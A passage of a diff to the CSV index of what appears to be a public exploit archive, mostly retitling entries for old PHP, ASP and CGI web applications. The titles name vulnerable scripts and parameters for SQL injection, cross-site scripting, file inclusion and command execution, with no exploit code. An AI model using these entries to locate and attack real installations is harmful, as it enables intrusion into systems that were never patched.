Injection",2005-10-26,svsecurity,php,webapps,0 26428,platforms/php/webapps/26428.html,"Search Enhanced Module 1.1/2.0 for PHP-Nuke - HTML Injection",2005-10-26,bhfh01,php,webapps,0 @@ -28718,14 +28729,14 @@ id,file,description,date,author,platform,type,port 26438,platforms/php/webapps/26438.txt,"Invision Gallery 2.0.3 - 'index.php' SQL Injection",2005-10-31,almaster,php,webapps,0 26439,platforms/asp/webapps/26439.txt,"Snitz Forum 2000 - post.asp Cross-Site Scripting",2005-10-31,h4xorcrew,asp,webapps,0 26440,platforms/php/webapps/26440.txt,"PHPCafe Tutorial Manager - 'index.php' SQL Injection",2005-10-31,almaster,php,webapps,0 -26441,platforms/php/webapps/26441.txt,"OaBoard 1.0 - forum.php Multiple SQL Injection",2005-10-31,abducter_minds@yahoo.com,php,webapps,0 +26441,platforms/php/webapps/26441.txt,"OaBoard 1.0 - 'forum.php' Multiple SQL Injections",2005-10-31,abducter_minds@yahoo.com,php,webapps,0 26442,platforms/php/webapps/26442.txt,"PHP 4.x - PHPInfo Cross-Site Scripting",2005-10-31,"Stefan Esser",php,webapps,0 26444,platforms/asp/webapps/26444.txt,"Comersus Backoffice 4.x/5.0/6.0 - comersus_Backoffice_supportError.asp error Parameter Cross-Site Scripting",2005-10-31,_6mO_HaCk,asp,webapps,0 -26445,platforms/asp/webapps/26445.pl,"Comersus Backoffice 4.x/5.0/6.0 - /comersus/database/comersus.mdb Direct Request Database Disclosure",2005-10-31,_6mO_HaCk,asp,webapps,0 +26445,platforms/asp/webapps/26445.pl,"Comersus Backoffice 4.x/5.0/6.0 - '/comersus/database/comersus.mdb' Direct Request Database Disclosure",2005-10-31,_6mO_HaCk,asp,webapps,0 26446,platforms/php/webapps/26446.txt,"Belchior Foundry vCard Pro 3.1 - Addrbook.php SQL Injection",2005-11-01,almaster,php,webapps,0 26447,platforms/php/webapps/26447.html,"Elite Forum 1.0 - HTML Injection",2005-11-01,gladiator,php,webapps,0 26449,platforms/php/webapps/26449.txt,"e107 Advanced Medal System Plugin - SQL Injection",2013-06-26,"Life Wasted",php,webapps,0 -26453,platforms/php/webapps/26453.py,"PHP-Charts 1.0 - 'index.php type Parameter' Remote Code Execution",2013-06-26,infodox,php,webapps,0 +26453,platforms/php/webapps/26453.py,"PHP-Charts 1.0 - 'index.php' 'type' Parameter Remote Code Execution",2013-06-26,infodox,php,webapps,0 26455,platforms/php/webapps/26455.txt,"VUBB - 'index.php' Cross-Site Scripting",2005-11-01,"Alireza Hassani",php,webapps,0 26456,platforms/php/webapps/26456.txt,"XMB Forum 1.9.3 - post.php SQL Injection",2005-11-01,almaster,php,webapps,0 26458,platforms/php/webapps/26458.txt,"News2Net 3.0 - 'index.php' SQL Injection",2005-11-02,Mousehack,php,webapps,0 @@ -28746,11 +28757,11 @@ id,file,description,date,author,platform,type,port 26477,platforms/php/webapps/26477.txt,"XMB Forum 1.9.3 - u2u.php Cross-Site Scripting",2005-11-07,"HACKERS PAL",php,webapps,0 26478,platforms/php/webapps/26478.txt,"Invision Power Services Invision Board 2.1 - admin.php Multiple Parameter Cross-Site Scripting",2005-11-07,benjilenoob,php,webapps,0 26480,platforms/php/webapps/26480.txt,"ToendaCMS 0.6.1 - admin.php Directory Traversal",2005-11-07,"Bernhard Mueller",php,webapps,0 -26481,platforms/php/webapps/26481.txt,"PHPList Mailing List Manager 2.x - /admin/admin.php id Parameter SQL Injection",2005-11-07,"Tobias Klein",php,webapps,0 -26482,platforms/php/webapps/26482.txt,"PHPList Mailing List Manager 2.x - /admin/editattributes.php id Parameter SQL Injection",2005-11-07,"Tobias Klein",php,webapps,0 -26483,platforms/php/webapps/26483.txt,"PHPList Mailing List Manager 2.x - /admin/eventlog.php Multiple Parameter Cross-Site Scripting",2005-11-07,"Tobias Klein",php,webapps,0 -26484,platforms/php/webapps/26484.txt,"PHPList Mailing List Manager 2.x - /admin/configure.php id Parameter Cross-Site Scripting",2005-11-07,"Tobias Klein",php,webapps,0 -26485,platforms/php/webapps/26485.txt,"PHPList Mailing List Manager 2.x - /admin/users.php find Parameter Cross-Site Scripting",2005-11-07,"Tobias Klein",php,webapps,0 +26481,platforms/php/webapps/26481.txt,"PHPList Mailing List Manager 2.x - '/admin/admin.php' 'id' Parameter SQL Injection",2005-11-07,"Tobias Klein",php,webapps,0 +26482,platforms/php/webapps/26482.txt,"PHPList Mailing List Manager 2.x - '/admin/editattributes.php' 'id' Parameter SQL Injection",2005-11-07,"Tobias Klein",php,webapps,0 +26483,platforms/php/webapps/26483.txt,"PHPList Mailing List Manager 2.x - '/admin/eventlog.php' Multiple Parameter Cross-Site Scripting",2005-11-07,"Tobias Klein",php,webapps,0 +26484,platforms/php/webapps/26484.txt,"PHPList Mailing List Manager 2.x - '/admin/configure.php' 'id' Parameter Cross-Site Scripting",2005-11-07,"Tobias Klein",php,webapps,0 +26485,platforms/php/webapps/26485.txt,"PHPList Mailing List Manager 2.x - '/admin/users.php' 'find' Parameter Cross-Site Scripting",2005-11-07,"Tobias Klein",php,webapps,0 26486,platforms/php/webapps/26486.txt,"SAP Web Application Server 6.x/7.0 - Error Page Cross-Site Scripting",2005-11-09,"Leandro Meiners",php,webapps,0 26487,platforms/php/webapps/26487.txt,"SAP Web Application Server 6.x/7.0 - frameset.htm sap-syscmd Parameter Cross-Site Scripting",2005-11-09,"Leandro Meiners",php,webapps,0 26488,platforms/php/webapps/26488.txt,"SAP Web Application Server 6.x/7.0 - URI redirection",2005-11-09,"Leandro Meiners",php,webapps,0 @@ -28763,11 +28774,11 @@ id,file,description,date,author,platform,type,port 26503,platforms/php/webapps/26503.txt,"Wizz Forum - ForumAuthDetails.php AuthID Parameter SQL Injection",2005-11-14,"HACKERS PAL",php,webapps,0 26504,platforms/php/webapps/26504.txt,"Wizz Forum - forumreply.php TopicID Parameter SQL Injection",2005-11-14,"HACKERS PAL",php,webapps,0 26505,platforms/php/webapps/26505.txt,"Codegrrl - Protection.php Unspecified Code Execution",2005-11-14,"Robin Verton",php,webapps,0 -26506,platforms/cgi/webapps/26506.txt,"Walla TeleSite 3.0 - ts.exe tsurl Variable Arbitrary Article Access",2005-11-15,"Rafi Nahum",cgi,webapps,0 -26507,platforms/cgi/webapps/26507.txt,"Walla TeleSite 3.0 - ts.exe sug Parameter Cross-Site Scripting",2005-11-15,"Rafi Nahum",cgi,webapps,0 -26508,platforms/cgi/webapps/26508.txt,"Walla TeleSite 3.0 - ts.exe sug Parameter SQL Injection",2005-11-15,"Rafi Nahum",cgi,webapps,0 +26506,platforms/cgi/webapps/26506.txt,"Walla TeleSite 3.0 - 'ts.exe' 'tsurl' Parameter Arbitrary Article Access",2005-11-15,"Rafi Nahum",cgi,webapps,0 +26507,platforms/cgi/webapps/26507.txt,"Walla TeleSite 3.0 - 'ts.exe' 'sug' Parameter Cross-Site Scripting",2005-11-15,"Rafi Nahum",cgi,webapps,0 +26508,platforms/cgi/webapps/26508.txt,"Walla TeleSite 3.0 - 'ts.exe' 'sug' Parameter SQL Injection",2005-11-15,"Rafi Nahum",cgi,webapps,0 26509,platforms/cgi/webapps/26509.txt,"Walla TeleSite 3.0 - ts.cgi File Existence Enumeration",2005-11-15,"Rafi Nahum",cgi,webapps,0 -26510,platforms/php/webapps/26510.txt,"Pearl Forums 2.0 - 'index.php' Multiple SQL Injection",2005-11-15,abducter_minds@yahoo.com,php,webapps,0 +26510,platforms/php/webapps/26510.txt,"Pearl Forums 2.0 - 'index.php' Multiple SQL Injections",2005-11-15,abducter_minds@yahoo.com,php,webapps,0 26511,platforms/php/webapps/26511.txt,"Pearl Forums 2.0 - 'index.php' Local File Inclusion",2005-11-15,abducter_minds@yahoo.com,php,webapps,0 26512,platforms/php/webapps/26512.txt,"PHPWCMS 1.2.5 -DEV - 'login.php' form_lang Parameter Traversal Arbitrary File Access",2005-11-15,"Stefan Lochbihler",php,webapps,0 26513,platforms/php/webapps/26513.txt,"PHPWCMS 1.2.5 -DEV - 'imgdir' Parameter Traversal Arbitrary File Access",2005-11-15,"Stefan Lochbihler",php,webapps,0 @@ -28872,7 +28883,7 @@ id,file,description,date,author,platform,type,port 26635,platforms/php/webapps/26635.txt,"FreeWebStat 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2005-11-28,"Francesco Ongaro",php,webapps,0 26636,platforms/php/webapps/26636.txt,"PHP Web Statistik 1.4 - Content Injection",2005-11-28,"Francesco Ongaro",php,webapps,0 26637,platforms/php/webapps/26637.txt,"Helpdesk Issue Manager 0.x - issue.php id Parameter SQL Injection",2005-11-28,r0t3d3Vil,php,webapps,0 -26638,platforms/php/webapps/26638.txt,"Helpdesk Issue Manager 0.x - find.php Multiple Parameter SQL Injection",2005-11-28,r0t3d3Vil,php,webapps,0 +26638,platforms/php/webapps/26638.txt,"Helpdesk Issue Manager 0.x - 'find.php' Multiple Parameter SQL Injection",2005-11-28,r0t3d3Vil,php,webapps,0 26639,platforms/php/webapps/26639.txt,"GuppY 4.5 - editorTypetool.php meskin Parameter Traversal Arbitrary File Access",2005-11-28,retrogod@aliceposta.it,php,webapps,0 26640,platforms/php/webapps/26640.txt,"GuppY 4.5 - archbatch.php lng Parameter Traversal Arbitrary File Access",2005-11-28,retrogod@aliceposta.it,php,webapps,0 26641,platforms/php/webapps/26641.txt,"GuppY 4.5 - dbbatch.php lng Parameter Traversal Arbitrary File Access",2005-11-28,retrogod@aliceposta.it,php,webapps,0 @@ -28968,8 +28979,8 @@ id,file,description,date,author,platform,type,port 26746,platforms/asp/webapps/26746.txt,"A-FAQ 1.0 - faqDspItem.asp faqid Parameter SQL Injection",2005-12-06,r0t,asp,webapps,0 26747,platforms/asp/webapps/26747.txt,"A-FAQ 1.0 - faqDsp.asp catcode Parameter SQL Injection",2005-12-06,r0t,asp,webapps,0 26748,platforms/php/webapps/26748.txt,"DoceboLms 2.0.x - connector.php Directory Traversal",2005-12-06,rgod,php,webapps,0 -26750,platforms/php/webapps/26750.txt,"PluggedOut Blog 1.9.x - 'index.php' Multiple SQL Injection",2005-12-06,r0t,php,webapps,0 -26751,platforms/php/webapps/26751.txt,"Cars Portal 1.1 - 'index.php' Multiple SQL Injection",2005-12-06,r0t,php,webapps,0 +26750,platforms/php/webapps/26750.txt,"PluggedOut Blog 1.9.x - 'index.php' Multiple SQL Injections",2005-12-06,r0t,php,webapps,0 +26751,platforms/php/webapps/26751.txt,"Cars Portal 1.1 - 'index.php' Multiple SQL Injections",2005-12-06,r0t,php,webapps,0 26755,platforms/php/webapps/26755.txt,"Thwboard Beta 2.8 - calendar.php year Parameter SQL Injection",2005-12-07,trueend5,php,webapps,0 26756,platforms/php/webapps/26756.txt,"Thwboard Beta 2.8 - v_profile.php user Parameter SQL Injection",2005-12-07,trueend5,php,webapps,0 26757,platforms/php/webapps/26757.txt,"Thwboard Beta 2.8 - misc.php userid Parameter SQL Injection",2005-12-07,trueend5,php,webapps,0 @@ -29159,12 +29170,12 @@ id,file,description,date,author,platform,type,port 26976,platforms/php/webapps/26976.txt,"Dev Web Management System 1.5 - getfile.php cat Parameter SQL Injection",2005-12-27,retrogod@aliceposta.it,php,webapps,0 26977,platforms/php/webapps/26977.txt,"Dev Web Management System 1.5 - download_now.php target Parameter SQL Injection",2005-12-27,retrogod@aliceposta.it,php,webapps,0 26978,platforms/php/webapps/26978.txt,"Dev Web Management System 1.5 - add.php Multiple Parameter Cross-Site Scripting",2005-12-27,retrogod@aliceposta.it,php,webapps,0 -26979,platforms/php/webapps/26979.txt,"IceWarp Universal WebMail - /accounts/inc/include.php Multiple Parameter Remote File Inclusion",2005-12-27,"Tan Chew Keong",php,webapps,0 -26980,platforms/php/webapps/26980.txt,"IceWarp Universal WebMail - /admin/inc/include.php Multiple Parameter Remote File Inclusion",2005-12-27,"Tan Chew Keong",php,webapps,0 -26981,platforms/php/webapps/26981.txt,"IceWarp Universal WebMail - /dir/include.html lang Parameter Local File Inclusion",2005-12-27,"Tan Chew Keong",php,webapps,0 -26982,platforms/php/webapps/26982.txt,"IceWarp Universal WebMail - /mail/settings.html Language Parameter Local File Inclusion",2005-12-27,"Tan Chew Keong",php,webapps,0 -26983,platforms/php/webapps/26983.txt,"IceWarp Universal WebMail - /mail/index.html lang_settings Parameter Remote File Inclusion",2005-12-27,"Tan Chew Keong",php,webapps,0 -26984,platforms/php/webapps/26984.txt,"IceWarp Universal WebMail - /mail/include.html Crafted HTTP_USER_AGENT Arbitrary File Access",2005-12-27,"Tan Chew Keong",php,webapps,0 +26979,platforms/php/webapps/26979.txt,"IceWarp Universal WebMail - '/accounts/inc/include.php' Multiple Parameter Remote File Inclusion",2005-12-27,"Tan Chew Keong",php,webapps,0 +26980,platforms/php/webapps/26980.txt,"IceWarp Universal WebMail - '/admin/inc/include.php' Multiple Parameter Remote File Inclusion",2005-12-27,"Tan Chew Keong",php,webapps,0 +26981,platforms/php/webapps/26981.txt,"IceWarp Universal WebMail - '/dir/include.html' 'lang' Parameter Local File Inclusion",2005-12-27,"Tan Chew Keong",php,webapps,0 +26982,platforms/php/webapps/26982.txt,"IceWarp Universal WebMail - '/mail/settings.html' 'Language' Parameter Local File Inclusion",2005-12-27,"Tan Chew Keong",php,webapps,0 +26983,platforms/php/webapps/26983.txt,"IceWarp Universal WebMail - '/mail/index.html' 'lang_settings' Parameter Remote File Inclusion",2005-12-27,"Tan Chew Keong",php,webapps,0 +26984,platforms/php/webapps/26984.txt,"IceWarp Universal WebMail - '/mail/include.html' Crafted HTTP_USER_AGENT Arbitrary File Access",2005-12-27,"Tan Chew Keong",php,webapps,0 26986,platforms/cfm/webapps/26986.txt,"PaperThin CommonSpot Content Server 4.5 - Cross-Site Scripting",2005-12-23,r0t3d3Vil,cfm,webapps,0 40575,platforms/php/webapps/40575.html,"CNDSOFT 2.3 - Cross-Site Request Forgery / Arbitrary File Upload",2016-10-19,Besim,php,webapps,0 26987,platforms/java/webapps/26987.txt,"FatWire UpdateEngine 6.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-27,r0t3d3Vil,java,webapps,0 @@ -29182,7 +29193,7 @@ id,file,description,date,author,platform,type,port 27001,platforms/php/webapps/27001.txt,"VEGO Links Builder 2.0 Login Script - SQL Injection",2005-12-29,"Aliaksandr Hartsuyeu",php,webapps,0 27002,platforms/php/webapps/27002.txt,"Jevontech PHPenpals - PersonalID SQL Injection",2005-12-29,"Aliaksandr Hartsuyeu",php,webapps,0 27003,platforms/php/webapps/27003.txt,"InTouch 0.5.1 Alpha - User Variable SQL Injection",2006-01-01,"Aliaksandr Hartsuyeu",php,webapps,0 -27004,platforms/php/webapps/27004.txt,"PHPJournaler 1.0 - Readold Variable SQL Injection",2006-01-01,"Aliaksandr Hartsuyeu",php,webapps,0 +27004,platforms/php/webapps/27004.txt,"PHPJournaler 1.0 - 'Readold' Parameter SQL Injection",2006-01-01,"Aliaksandr Hartsuyeu",php,webapps,0 27633,platforms/php/webapps/27633.txt,"MyBB 1.10 - member.php Cross-Site Scripting",2006-04-12,o.y.6,php,webapps,0 27005,platforms/hardware/webapps/27005.txt,"Barracuda LB / SVF / WAF / WEF - Multiple Vulnerabilities",2013-07-22,Vulnerability-Lab,hardware,webapps,0 27006,platforms/hardware/webapps/27006.txt,"Barracuda CudaTel 2.6.02.040 - SQL Injection",2013-07-22,Vulnerability-Lab,hardware,webapps,0 @@ -29195,7 +29206,7 @@ id,file,description,date,author,platform,type,port 27015,platforms/php/webapps/27015.txt,"Chipmunk Guestbook 1.4 - Homepage HTML Injection",2005-12-29,"Aliaksandr Hartsuyeu",php,webapps,0 27016,platforms/php/webapps/27016.txt,"Chimera Web Portal 0.2 - modules.php Multiple Parameter Cross-Site Scripting",2006-01-01,"Aliaksandr Hartsuyeu",php,webapps,0 27017,platforms/php/webapps/27017.txt,"Chimera Web Portal 0.2 - linkcategory.php id Parameter SQL Injection",2006-01-01,"Aliaksandr Hartsuyeu",php,webapps,0 -27018,platforms/php/webapps/27018.txt,"ScozNet ScozBook 1.1 - AdminName Variable SQL Injection",2006-01-02,"Aliaksandr Hartsuyeu",php,webapps,0 +27018,platforms/php/webapps/27018.txt,"ScozNet ScozBook 1.1 - 'AdminName' Parameter SQL Injection",2006-01-02,"Aliaksandr Hartsuyeu",php,webapps,0 27019,platforms/php/webapps/27019.txt,"vBulletin 3.5.2 - Event Title HTML Injection",2006-02-01,trueend5,php,webapps,0 27020,platforms/php/webapps/27020.txt,"Drupal 4.x - URL-Encoded Input HTML Injection",2006-01-01,liz0,php,webapps,0 27021,platforms/cgi/webapps/27021.txt,"DiscusWare Discus 3.10 - Error Message Cross-Site Scripting",2006-01-02,$um$id,cgi,webapps,0 @@ -29207,9 +29218,9 @@ id,file,description,date,author,platform,type,port 27029,platforms/php/webapps/27029.txt,"EZ Invoice Inc. EZI 2.0 - Invoices.php SQL Injection",2005-12-25,r0t3d3Vil,php,webapps,0 27030,platforms/php/webapps/27030.txt,"CS-Cart - Multiple SQL Injections",2005-12-25,r0t3d3Vil,php,webapps,0 27033,platforms/php/webapps/27033.txt,"Foro Domus 2.10 - Multiple Input Validation Vulnerabilities",2006-01-06,"Aliaksandr Hartsuyeu",php,webapps,0 -27034,platforms/asp/webapps/27034.txt,"OnePlug CMS - /press/details.asp Press_Release_ID Parameter SQL Injection",2006-01-06,Preddy,asp,webapps,0 -27035,platforms/asp/webapps/27035.txt,"OnePlug CMS - /services/details.asp Service_ID Parameter SQL Injection",2006-01-06,Preddy,asp,webapps,0 -27036,platforms/asp/webapps/27036.txt,"OnePlug CMS - /products/details.asp Product_ID Parameter SQL Injection",2006-01-06,Preddy,asp,webapps,0 +27034,platforms/asp/webapps/27034.txt,"OnePlug CMS - '/press/details.asp' 'Press_Release_ID' Parameter SQL Injection",2006-01-06,Preddy,asp,webapps,0 +27035,platforms/asp/webapps/27035.txt,"OnePlug CMS - '/services/details.asp' 'Service_ID' Parameter SQL Injection",2006-01-06,Preddy,asp,webapps,0 +27036,platforms/asp/webapps/27036.txt,"OnePlug CMS - '/products/details.asp' 'Product_ID' Parameter SQL Injection",2006-01-06,Preddy,asp,webapps,0 27037,platforms/php/webapps/27037.txt,"TheWebForum 1.2.1 - Multiple Input Validation Vulnerabilities",2006-01-06,"Aliaksandr Hartsuyeu",php,webapps,0 27038,platforms/php/webapps/27038.txt,"TinyPHPForum 3.6 - Multiple Directory Traversal Vulnerabilities",2006-01-06,"Aliaksandr Hartsuyeu",php,webapps,0 27039,platforms/php/webapps/27039.txt,"Dell Kace 1000 SMA 5.4.742 - SQL Injection",2013-07-23,Vulnerability-Lab,php,webapps,0 @@ -29221,7 +29232,7 @@ id,file,description,date,author,platform,type,port 27042,platforms/ios/webapps/27042.txt,"Photo Server 2.0 iOS - Multiple Vulnerabilities",2013-07-23,Vulnerability-Lab,ios,webapps,0 27048,platforms/php/webapps/27048.txt,"AppServ Open Project 2.4.5 - Remote File Inclusion",2006-01-09,Xez,php,webapps,0 27052,platforms/php/webapps/27052.txt,"427BB 2.2 - 'showthread.php' SQL Injection",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0 -27053,platforms/php/webapps/27053.txt,"Venom Board - Post.php3 Multiple SQL Injection",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0 +27053,platforms/php/webapps/27053.txt,"Venom Board - 'Post.php3' Multiple SQL Injections",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0 27054,platforms/php/webapps/27054.txt,"427BB 2.2 - Authentication Bypass",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0 27058,platforms/php/webapps/27058.txt,"PHP-Nuke 7.7 EV Search Module - SQL Injection",2006-01-09,Lostmon,php,webapps,0 27059,platforms/php/webapps/27059.txt,"Xoops Pool Module - IMG Tag HTML Injection",2006-01-09,night_warrior771,php,webapps,0 @@ -29253,7 +29264,7 @@ id,file,description,date,author,platform,type,port 27097,platforms/php/webapps/27097.txt,"PHPXplorer 0.9.33 - Workspaces.php Directory Traversal",2006-01-16,"Oriol Torrent Santiago",php,webapps,0 27098,platforms/php/webapps/27098.txt,"RedKernel Referrer Tracker 1.1.0-3 - Rkrt_stats.php Cross-Site Scripting",2006-01-16,Preddy,php,webapps,0 27099,platforms/php/webapps/27099.txt,"BlogPHP 1.0 - 'index.php' SQL Injection",2006-01-16,"Aliaksandr Hartsuyeu",php,webapps,0 -27100,platforms/php/webapps/27100.txt,"microBlog 2.0 - 'index.php' Multiple SQL Injection",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0 +27100,platforms/php/webapps/27100.txt,"microBlog 2.0 - 'index.php' Multiple SQL Injections",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0 27102,platforms/php/webapps/27102.txt,"PowerPortal 1.1/1.3 - 'index.php' Cross-Site Scripting",2006-01-17,night_warrior771,php,webapps,0 27103,platforms/php/webapps/27103.txt,"PowerPortal 1.1/1.3 - 'search.php' Cross-Site Scripting",2006-01-17,night_warrior771,php,webapps,0 27104,platforms/php/webapps/27104.txt,"aoblogger 2.3 - URL BBcode Cross-Site Scripting",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -29266,7 +29277,7 @@ id,file,description,date,author,platform,type,port 27112,platforms/php/webapps/27112.txt,"SaralBlog 1.0 - Multiple Input Validation Vulnerabilities",2006-01-18,"Aliaksandr Hartsuyeu",php,webapps,0 27114,platforms/php/webapps/27114.txt,"WebspotBlogging 3.0 - 'login.php' SQL Injection",2006-01-19,"Aliaksandr Hartsuyeu",php,webapps,0 27115,platforms/cgi/webapps/27115.txt,"Rockliffe MailSite 5.3.4/6.1.22/7.0.3 - HTTP Mail Management Cross-Site Scripting",2006-01-20,"OS2A BTO",cgi,webapps,0 -27116,platforms/php/webapps/27116.txt,"NewsPHP - 'index.php' Multiple SQL Injection",2006-01-23,SAUDI,php,webapps,0 +27116,platforms/php/webapps/27116.txt,"NewsPHP - 'index.php' Multiple SQL Injections",2006-01-23,SAUDI,php,webapps,0 27117,platforms/php/webapps/27117.txt,"BlogPHP 1.2 - Multiple SQL Injections",2006-01-20,imei,php,webapps,0 27118,platforms/php/webapps/27118.pl,"RCBlog 1.0.3 - 'index.php' Directory Traversal",2006-01-20,"Aliaksandr Hartsuyeu",php,webapps,0 27119,platforms/php/webapps/27119.txt,"e-moBLOG 1.3 - Multiple SQL Injections",2006-01-23,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -29288,7 +29299,7 @@ id,file,description,date,author,platform,type,port 27139,platforms/php/webapps/27139.txt,"My Little Homepage Products - BBCode Link Tag Script Injection",2006-01-26,"Aliaksandr Hartsuyeu",php,webapps,0 27141,platforms/cgi/webapps/27141.txt,"Elido Face Control - Multiple Directory Traversal Vulnerabilities",2006-01-26,"HSC Security Group",cgi,webapps,0 27142,platforms/asp/webapps/27142.txt,"ASPThai Forums 8.0 - 'login.asp' SQL Injection",2006-01-19,code.shell,asp,webapps,0 -27143,platforms/asp/webapps/27143.txt,"ZixForum 1.12 - forum.asp Multiple SQL Injection",2005-12-15,"Tran Viet Phuong",asp,webapps,0 +27143,platforms/asp/webapps/27143.txt,"ZixForum 1.12 - forum.asp Multiple SQL Injections",2005-12-15,"Tran Viet Phuong",asp,webapps,0 27146,platforms/php/webapps/27146.txt,"sPaiz-Nuke - modules.php Cross-Site Scripting",2006-01-30,night_warrior771,php,webapps,0 27147,platforms/php/webapps/27147.txt,"PmWiki 2.1 - Multiple Input Validation Vulnerabilities",2006-01-30,aScii,php,webapps,0 27149,platforms/php/webapps/27149.txt,"Ashwebstudio Ashnews 0.83 - Cross-Site Scripting",2006-01-30,0o_zeus_o0,php,webapps,0 @@ -29317,8 +29328,8 @@ id,file,description,date,author,platform,type,port 27177,platforms/hardware/webapps/27177.html,"TRENDnet TEW-812DRU - Cross-Site Request Forgery/Command Injection Root Exploit",2013-07-28,"Jacob Holcomb",hardware,webapps,0 27361,platforms/php/webapps/27361.txt,"Invision Power Board 2.1.5 - showtopic SQL Injection",2006-03-06,Mr.SNAKE,php,webapps,0 27183,platforms/php/webapps/27183.txt,"Farsinews 2.1/2.5 - 'show_archives.php' template Parameter Traversal Arbitrary File Access",2006-02-10,"Hamid Ebadi",php,webapps,0 -27184,platforms/php/webapps/27184.txt,"HiveMail 1.2.2/1.3 - addressbook.update.php contactgroupid Variable Arbitrary PHP Command Execution",2006-02-11,"GulfTech Security",php,webapps,0 -27185,platforms/php/webapps/27185.txt,"HiveMail 1.2.2/1.3 - folders.update.php folderid Variable Arbitrary PHP Command Execution",2006-02-11,"GulfTech Security",php,webapps,0 +27184,platforms/php/webapps/27184.txt,"HiveMail 1.2.2/1.3 - 'addressbook.update.php' 'contactgroupid' Parameter Arbitrary PHP Command Execution",2006-02-11,"GulfTech Security",php,webapps,0 +27185,platforms/php/webapps/27185.txt,"HiveMail 1.2.2/1.3 - 'folders.update.php' 'folderid' Parameter Arbitrary PHP Command Execution",2006-02-11,"GulfTech Security",php,webapps,0 27186,platforms/php/webapps/27186.txt,"HiveMail 1.2.2/1.3 - 'index.php' $_SERVER['PHP_SELF'] Cross-Site Scripting",2006-02-11,"GulfTech Security",php,webapps,0 27187,platforms/jsp/webapps/27187.py,"OpenEMM-2013 8.10.380.hf13.0.066 - SOAP SQL Injection / Persistent Cross-Site Scripting",2013-07-29,drone,jsp,webapps,0 27188,platforms/ios/webapps/27188.txt,"Private Photos 1.0 iOS - Persistent Cross-Site Scripting",2013-07-29,Vulnerability-Lab,ios,webapps,0 @@ -29329,7 +29340,7 @@ id,file,description,date,author,platform,type,port 27194,platforms/php/webapps/27194.txt,"LinPHA 0.9.x/1.0 - 'sec_stage_install.php' Parameter Local File Inclusion",2006-02-11,rgod,php,webapps,0 27195,platforms/php/webapps/27195.txt,"LinPHA 0.9.x/1.0 - 'forth_stage_install.php' Local File Inclusion",2006-02-11,rgod,php,webapps,0 27197,platforms/php/webapps/27197.txt,"ImageVue 0.16.1 - dir.php Folder Permission Disclosure",2006-02-11,zjieb,php,webapps,0 -27198,platforms/php/webapps/27198.txt,"ImageVue 0.16.1 - readfolder.php path Variable Arbitrary Directory Listing",2006-02-11,zjieb,php,webapps,0 +27198,platforms/php/webapps/27198.txt,"ImageVue 0.16.1 - 'readfolder.php' 'path' Parameter Arbitrary Directory Listing",2006-02-11,zjieb,php,webapps,0 27199,platforms/php/webapps/27199.txt,"ImageVue 0.16.1 - 'index.php' bgcol Parameter Cross-Site Scripting",2006-02-11,zjieb,php,webapps,0 27200,platforms/php/webapps/27200.txt,"ImageVue 0.16.1 - upload.php Unrestricted Arbitrary File Upload",2006-02-11,zjieb,php,webapps,0 27201,platforms/php/webapps/27201.txt,"Siteframe Beaumont 5.0.1 - search.php Q Parameter Cross-Site Scripting",2006-02-12,Kiki,php,webapps,0 @@ -29344,21 +29355,21 @@ id,file,description,date,author,platform,type,port 27214,platforms/php/webapps/27214.txt,"DELTAScripts PHP Classifieds 6.20 - Member_Login.php SQL Injection",2006-02-14,"Audun Larsen",php,webapps,0 27215,platforms/php/webapps/27215.txt,"sNews - Comment Body Cross-Site Scripting",2006-02-14,joffer,php,webapps,0 27216,platforms/php/webapps/27216.txt,"sNews - 'index.php' Multiple Parameter SQL Injection",2006-02-14,joffer,php,webapps,0 -27217,platforms/php/webapps/27217.txt,"dotProject 2.0 - /modules/projects/gantt.php dPconfig[root_dir] Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 -27218,platforms/php/webapps/27218.txt,"dotProject 2.0 - /includes/db_connect.php baseDir Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 -27219,platforms/php/webapps/27219.txt,"dotProject 2.0 - /includes/session.php baseDir Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 -27220,platforms/php/webapps/27220.txt,"dotProject 2.0 - /modules/projects/gantt2.php dPconfig[root_dir] Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 -27221,platforms/php/webapps/27221.txt,"dotProject 2.0 - /modules/projects/vw_files.php dPconfig[root_dir] Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 -27222,platforms/php/webapps/27222.txt,"dotProject 2.0 - /modules/admin/vw_usr_roles.php baseDir Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 -27223,platforms/php/webapps/27223.txt,"dotProject 2.0 - /modules/public/calendar.php baseDir Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 -27224,platforms/php/webapps/27224.txt,"dotProject 2.0 - /modules/public/date_format.php baseDir Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 -27225,platforms/php/webapps/27225.txt,"dotProject 2.0 - /modules/tasks/gantt.php baseDir Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 +27217,platforms/php/webapps/27217.txt,"dotProject 2.0 - '/modules/projects/gantt.php' 'dPconfig[root_dir]' Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 +27218,platforms/php/webapps/27218.txt,"dotProject 2.0 - '/includes/db_connect.php' 'baseDir' Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 +27219,platforms/php/webapps/27219.txt,"dotProject 2.0 - '/includes/session.php' 'baseDir' Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 +27220,platforms/php/webapps/27220.txt,"dotProject 2.0 - '/modules/projects/gantt2.php' 'dPconfig[root_dir]' Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 +27221,platforms/php/webapps/27221.txt,"dotProject 2.0 - '/modules/projects/vw_files.php' 'dPconfig[root_dir]' Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 +27222,platforms/php/webapps/27222.txt,"dotProject 2.0 - '/modules/admin/vw_usr_roles.php' 'baseDir' Parameter Remote File 